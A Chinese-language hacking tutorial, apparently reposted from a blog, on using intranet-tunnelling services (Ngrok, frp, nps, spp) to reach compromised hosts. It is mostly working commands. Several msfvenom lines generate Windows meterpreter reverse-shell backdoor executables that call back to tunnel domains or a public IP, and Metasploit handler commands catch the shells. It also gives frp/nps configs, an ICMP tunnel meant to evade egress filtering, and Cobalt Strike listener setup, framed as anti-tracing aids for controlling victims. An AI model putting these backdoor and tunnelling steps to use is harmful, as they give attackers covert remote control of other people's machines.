赞
踩
旨在代理连接肉鸡后实现本地渗透肉鸡网络架构
Linux:Proxychains
Windows:Sockscap Proxifier
穿透项目:Ngrok Frp Spp Nps EW(停更)
优点:穿透加密数据,中间平台,防追踪,解决网络问题
https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm
需要实名人脸验证
收费 官网注册按照使用手册就可以实现内网穿透,认证需要手续费,提供免费隧道但是速度慢
https://www.ngrok.cc/
支持的协议:tcp、http、https
支持的类型:正向代理、反向代理
提供Ngrok和Frp两种服务器,两种服务器都支持http、https、tcp转发,Ngrok不支持udp转发,但是Frp支持udp的。两个服务器在使用上没有太多差别。如果是调试支付回调或者微信开发的话,Ngrok会比Frp好更多,因为可以http请求重现
开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道
./sunny clientid 133328291918 //控制端连接Ngrok的服务器
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe
注意这里生成木马是使用的是ngrok平台提供的域名,本地kali客户端使用隧道号与平台建立连接,靶机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到本地kali上,实现内网穿透。免费的隧道协议有三种,如果上不了线可以一一尝试。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run
推荐
https://github.com/fatedier/frp
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。
自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们
服务器修改配置文件frps.ini:
[common] bind_port = 7000
启动服务端:
./frps -c ./frps.ini
控制端修改配置文件frpc.ini:
[common] server_addr = 47.94.236.117 server_port = 7000
#frpc工作端口,必须和上面frps保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 #转发给本机的5555 remote_port = 6000
#服务端用6000端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
注意kali lilnux 监听的LHOST地址为127.0.0.1:5555,靶机为win server 2008 跳板机为vps
frp内网穿透-上线本地kali
推荐 相当于自己管理整个平台很方便
https://github.com/ehang-io/nps
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
1、启动
./nps install
./nps
http://IP:8080/ admin/123
2、创建客户端,生成密匙
3、添加协议隧道,绑定指向
远程绑定5566,指向本地88
1、连接服务端:
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v #创建客户端后自动生成密钥
2、生成后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe
3、监听后门:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 88
run
https://github.com/esrrhs/spp
支持的协议:tcp、udp、udp、icmp、http、kcp、quic
支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理
在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,
但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。
在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。
./spp -type server -proto ricmp -listen 0.0.0.0
spp -name “test” -type proxy_client -server 47.94.236.117 -fromaddr :5555 -toaddr :80 -proxyproto tcp -proto ricmp
3、CS
监听器1:http 47.94.236.117 80
监听器2:http 127.0.0.1 5555
生成后门:监听器2
使用隧道后,会话交互会很慢,很容易断开连接
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。